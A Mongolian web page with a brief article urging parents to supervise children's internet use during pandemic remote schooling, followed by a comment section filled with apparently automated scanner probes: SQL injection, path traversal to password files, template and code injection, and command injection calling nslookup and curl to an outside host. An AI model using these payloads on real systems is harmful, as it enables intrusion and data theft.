• Нүүр хуудас
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

Хүүхдийнхээ интернэт хэрэглээнд хяналт тавиарай

2021-02-05
Хүүхдийнхээ интернэт хэрэглээнд хяналт тавиарай

“Covid-19” өвчний улмаас дэлхий дахинд үүсээд буй нөхцөл байдлаас шалтгаалан дэлхийн нийт оюутан, сурагчдын 99 хувь буюу 1.7 тэрбум[1] хүүхдийн танхимын хичээл тасалдаад байна.

 

Хүүхдүүдийн хичээл, сургууль тасалдсантай холбоотой нийгэм, эдийн засгийн олон асуудал үүсч байгаа бөгөөд дэлхийн цөөнгүй улсад дижитал хэлбэрээр хичээлийг үргэлжлүүлж байна.

Үүнээс шалтгаалан хүүхдүүдийн интернэт хэрэглээ нэмэгдэж, цахим орчинд өнгөрөөх хугацаа уртассан. Манай улсад ч ийм нөхцөл байдал үүссэн бөгөөд эцэг эх, асран хамгаалагчийн зүгээс хүүхдийнхээ интернэт хэрэглээнд хяналт тавихад анхаарал хандуулах зүй ёсны шаардлага бий болоод байна.

ДЭМБ-ын судалгаагаар жил бүр 200 сая хүүхэд бэлгийн мөлжлөг, хүчирхийллийн золиос болдог байна. Үүний тодорхой хувь нь цахим орчинд үйлдэгдэж, жилээс жилд хувь хэмжээ нь нэмэгдэж байгаа бөгөөд интернэт орчин нь мөлжлөг, хүчирхийллийн талбар болж байна. Тийм учраас цахим орчин дахь хүүхэд хамгааллын асуудлыг бүхий л түвшинд авч үзэх шаардлагатай.

fnfOzvSR 555
2023-03-02 Хариулах
fnfOzvSR 555
2023-03-02 Хариулах
dfb{{98991*97996}}xca
2023-03-02 Хариулах
dfb__${98991*97996}__::.x
2023-03-02 Хариулах
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
2023-03-02 Хариулах
dfb{{'abcd'.toUpperCase()}}xca
2023-03-02 Хариулах
print("dfb" . 98991*97996 . "xca");
2023-03-02 Хариулах
dfb@(98991*97996)xca
2023-03-02 Хариулах
dfb#set($x=98991*97996)${x}xca
2023-03-02 Хариулах
dfb#{98991*97996}xca
2023-03-02 Хариулах
dfb{@98991*97996}xca
2023-03-02 Хариулах
dfb{{=98991*97996}}xca
2023-03-02 Хариулах
dfb{98991*97996}xca
2023-03-02 Хариулах
<%={{={@{#{${dfb}}%>
2023-03-02 Хариулах
../../../WEB-INF/web.xml;x=
2023-03-02 Хариулах
../../../../../../WEB-INF/web.xml
2023-03-02 Хариулах
//../....//....//WEB-INF/web.xml
2023-03-02 Хариулах
/..\..\WEB-INF\web.xml
2023-03-02 Хариулах
../../../WEB-INF/web.xml
2023-03-02 Хариулах
../../../../WEB-INF/web.xml
2023-03-02 Хариулах
../../WEB-INF/web.xml?
2023-03-02 Хариулах
@@Yoias
2023-03-02 Хариулах
1'"
2023-03-02 Хариулах
//WEB-INF/web.xml
2023-03-02 Хариулах
1����%2527%2522
2023-03-02 Хариулах
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2023-03-02 Хариулах
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
2023-03-02 Хариулах
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
2023-03-02 Хариулах
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
2023-03-02 Хариулах
QmQu0bqn')) OR 100=(SELECT 100 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
../../../../../../../../../../windows/win.ini%00.jpg
2023-03-02 Хариулах
vZ6CUHF8') OR 91=(SELECT 91 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
/WEB-INF/web.xml
2023-03-02 Хариулах
/\../\../\../\../\../\../\../etc/passwd
2023-03-02 Хариулах
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
2023-03-02 Хариулах
-1)) OR 698=(SELECT 698 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
/.././.././.././.././.././.././.././../etc/./passwd%00
2023-03-02 Хариулах
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
2023-03-02 Хариулах
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
2023-03-02 Хариулах
FQfWueMv'; waitfor delay '0:0:15' --
2023-03-02 Хариулах
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
2023-03-02 Хариулах
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
2023-03-02 Хариулах
../../../../../../../../../../../../../../windows/win.ini
2023-03-02 Хариулах
file:///etc/passwd
2023-03-02 Хариулах
../../../../../../../../../../../../../../etc/passwd
2023-03-02 Хариулах
1 waitfor delay '0:0:15' --
2023-03-02 Хариулах
-1); waitfor delay '0:0:15' --
2023-03-02 Хариулах
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
2023-03-02 Хариулах
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
2023-03-02 Хариулах
-1' OR 3+877-877-1=0+0+0+1 or 'jA49KsaL'='
2023-03-02 Хариулах
-1' OR 2+877-877-1=0+0+0+1 or 'jA49KsaL'='
2023-03-02 Хариулах
/\xfs.bxss.me?gov.mn
2023-03-02 Хариулах
-1' OR 3*2>(0+5+716-716) --
2023-03-02 Хариулах
//xfs.bxss.me?gov.mn
2023-03-02 Хариулах
xfs.bxss.me?gov.mn
2023-03-02 Хариулах
976910
2023-03-02 Хариулах
http://xfs.bxss.me?gov.mn
2023-03-02 Хариулах
-1 OR 3+725-725-1=0+0+0+1
2023-03-02 Хариулах
xfs.bxss.me
2023-03-02 Хариулах
-1' OR 2+716-716-1=0+0+0+1 --
2023-03-02 Хариулах
-1 OR 2+725-725-1=0+0+0+1
2023-03-02 Хариулах
1
2023-03-02 Хариулах
${@print(md5(31337))}\
2023-03-02 Хариулах
'.print(md5(31337)).'
2023-03-02 Хариулах
';print(md5(31337));$a='
2023-03-02 Хариулах
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2023-03-02 Хариулах
'+'A'.concat(70-3).concat(22*4).concat(118).concat(67).concat(99).concat(82)+(require'socket' Socket.gethostbyname('hitcs'+'qxjuklxoe9965.bxss.me.')[3].to_s)+'
2023-03-02 Хариулах
"&&sleep(27*1000)*rlmdet&&"
2023-03-02 Хариулах
bxss.me/t/xss.html?%00
2023-03-02 Хариулах
"||sleep(27*1000)*luwvnv||"
2023-03-02 Хариулах
'&&sleep(27*1000)*bnrymt&&'
2023-03-02 Хариулах
Http://bxss.me/t/fit.txt
2023-03-02 Хариулах
http://bxss.me/t/fit.txt%3F.jpg
2023-03-02 Хариулах
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
2023-03-02 Хариулах
'.gethostbyname(lc('hitxw'.'mbruufbzf7a24.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(83).chr(100).chr(84).'
2023-03-02 Хариулах
!(()&&!|*|*|
2023-03-02 Хариулах
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
2023-03-02 Хариулах
`(nslookup -q=cname hitqvbytqswxg1d8aa.bxss.me||curl hitqvbytqswxg1d8aa.bxss.me)`
2023-03-02 Хариулах
&n925661=v981556
2023-03-02 Хариулах
|(nslookup -q=cname hitmgjqetvjlj3f81f.bxss.me||curl hitmgjqetvjlj3f81f.bxss.me)
2023-03-02 Хариулах
$(nslookup -q=cname hitqqnmcmdxex2b71c.bxss.me||curl hitqqnmcmdxex2b71c.bxss.me)
2023-03-02 Хариулах
&nslookup -q=cname hitpvuaxnaahnc1e9c.bxss.me&'\"`0&nslookup -q=cname hitpvuaxnaahnc1e9c.bxss.me&`'
2023-03-02 Хариулах
(nslookup -q=cname hitnfvxafztjc9d4c8.bxss.me||curl hitnfvxafztjc9d4c8.bxss.me))
2023-03-02 Хариулах
echo bqprpx$()\ cepxcw\nz^xyu||a #' &echo bqprpx$()\ cepxcw\nz^xyu||a #|" &echo bqprpx$()\ cepxcw\nz^xyu||a #
2023-03-02 Хариулах
#{10000466+10000198}
2023-03-02 Хариулах
to@example.com>%0d%0abcc:009247.320-47804.320.0c6b3.19418.2@bxss.me
2023-03-02 Хариулах
response.write(9391119*9473633)
2023-03-02 Хариулах
'+response.write(9391119*9473633)+'
2023-03-02 Хариулах